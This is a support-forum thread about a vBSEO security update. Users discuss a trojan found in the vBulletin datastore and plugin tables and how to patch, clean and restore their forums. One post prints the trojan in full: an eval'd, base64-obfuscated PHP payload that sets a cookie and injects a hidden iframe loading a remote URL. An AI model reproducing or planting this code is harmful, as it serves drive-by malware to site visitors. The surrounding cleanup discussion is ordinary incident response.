Security Bulletin - vBSEO 3.5.2 Released

Another update. This same code can be found in the plugin table where title = vB Ad Management:

PHP Code:

$vbsets = "ba"."se6"."4_de"."cod"."e"; @eval($vbsets("aWYgKCFpc3NldCgkX0NPT0tJRVsnUEFzTyddKSkgew0KJHhiID0gYXJyYXkoJ01TSUUnLCdNeUlFJywnSUUnLCdGaXJlZm94JywnT3BlcmEnLCdOZXRzY2FwZScsJ0Nocm9tZScsJ1NhZmFyaScsJ01lZGlhIENlbnRlcicpOw0KJGlmcmFuZCA9IG10X3JhbmQoMCwxMjMpOw0KJGRvbWIgPSAiaHR0cDovL3d3dy53dGluZXR0by5jby5jYy9oYXZlbG8ucGhwIjsNCmZvcmVhY2ggKCR4YiBhcyAkeGJiKSB7DQppZihzdHJzdHIoc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pLHN0cnRvbG93ZXIoJHhiYikpKSB7DQplY2hvIDw8PEZMTw0KPHNjcmlwdD4NCmZ1bmN0aW9uIFNldENvb2tpZShjb29raWVOYW1lLGNvb2tpZUNvbnRlbnQpew0KIHZhciBjb29raWVQYXRoID0gJy8nOw0KIHZhciBleHBEYXRlPW5ldyBEYXRlKCk7DQogZXhwRGF0ZS5zZXRUaW1lKGV4cERhdGUuZ2V0VGltZSgpKzM3MjgwMDAwMCkgIDsNCiB2YXIgZXhwaXJlcz1leHBEYXRlLnRvR01UU3RyaW5nKCk7DQogZG9jdW1lbnQuY29va2llPWNvb2tpZU5hbWUrIj0iK2VzY2FwZShjb29raWVDb250ZW50KSsiO3BhdGg9Iitlc2NhcGUoY29va2llUGF0aCkrIjtleHBpcmVzPSIrZXhwaXJlczsgDQp9DQpTZXRDb29raWUoIlBBc08iLCAidHVyayIpOw0KPC9zY3JpcHQ+DQo8aWZyYW1lIG5hbWU9IiRpZnJhbmQiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHNjcm9sbGluZz0ibm8iIGZyYW1lYm9yZGVyPSJubyIgbWFyZ2lud2lkdGg9IjAiIG1hcmdpbmhlaWdodD0iMCIgc3JjPSIkZG9tYiI+PC9pZnJhbWU+DQpGTE87DQpicmVhazsNCiB9DQogfQ0KfQ==")); 


What seems interesting to me at least is that vB Ad Management is another plugin that is unrelated to vbSEO. Why would this trojan make its way into this table?

Hi I have vbseo 3.5.0 installed, how do I go about patching it?

Originally Posted by Brian Cummiskey

I replied to your ticket. you need to phsycally delete the serzlied data from your datastore db table.

I have done that and it just messes up the forums:

1) Forum stats on the left disappear (members, posts, threads, etc)
2) Articles section modifications disappear (appears as normal threads instead of using custom mod)
3) vbSEO copyright from footer is removed completely
4) Can't login to admincp - I get this error:

"Warning: array_merge() [function.array-merge]: Argument #1 is not an array in [path]/includes/init.php on line 281"

5) etc etc etc

I thought uninstalling and reinstalling vbSEO was supposed to fix this???

When I uninstalled the vb Ad Management plugin it removed the $vbsets variable from both the datastore table and the plugin table, but it threw an error and the forums would not load at all:

Fatal error: Class 'vbam' not found in /home/leanbulk/public_html/forum/includes/vbam_forum_functions.php on line 2

We were able to get the forums loading again by disabling the hooks and the cookie / trojan was gone. However, obviously none of the plugins worked after that and I wasn't even able to login to the admincp.

Originally Posted by ibodybuild

Hi I have vbseo 3.5.0 installed, how do I go about patching it?

3.5.0 was updated as well.
https://www.vbseo.com/vbseo_download.php?version=3.5.0

but you should really consider upgrading to 3.5.2 as 3.5.0 was effectively a 'release candidate' release.

Also , you should consider the possibility to investigate your other modifications. The issue you guys are facing can highly be related with another modification. Yes we released a security update however this doesn't mean all security issues are related to vBSEO.

Originally Posted by Mert Gökçeimam

Also , you should consider the possibility to investigate your other modifications. The issue you guys are facing can highly be related with another modification. Yes we released a security update however this doesn't mean all security issues are related to vBSEO.

Agreed with you Mert, Since there's a vBulletin forums has hacked with the same codes and they are NOT use vBSEO : Malware report on archive..

We fixed this issue by restoring the datastore and plugin table's with backups from June. It messed up a couple of our recently installed plugins, but the trojan is finally gone.

Im running 3.5.1 PL1 is this the patch we are discussing here? or do i need to update?

You should either download vBSEO 3.5.1 PL1 package and replace existing files or upgrade to vBSEO 3.5.2

i cant upgrade to 3.5.2 because of the expired license, however is it safe to use 3.5.1 pl1?

Originally Posted by vidan

i cant upgrade to 3.5.2 because of the expired license, however is it safe to use 3.5.1 pl1?

Yes, We have patched 3.5.1pl1 so you should re-download it now to get 3.5.1pl1 with patch and re-upload the files again to your forum.

Hello, we have just upgraded from vbseo 3.3.2 to 3.5.2 versions, everything seems to be working alright but I'm getting the following error on vbseo admin cp log in:

Your config.xml is writable. Don't forget to update permissions after you finish updating the configuration for security purposes.

Although my config.xml file is already CHMOD 644, but what exactly should I do? or is this message normal?

Thanks!

Hello,

As Brian and other staff members has explained, if you still see the warning message try to chmod config.xml file to 444.

3.5.2 upgrade showing "Your config.xml is writable"

Is this the latest version? Does it work with vButtlin 4.x?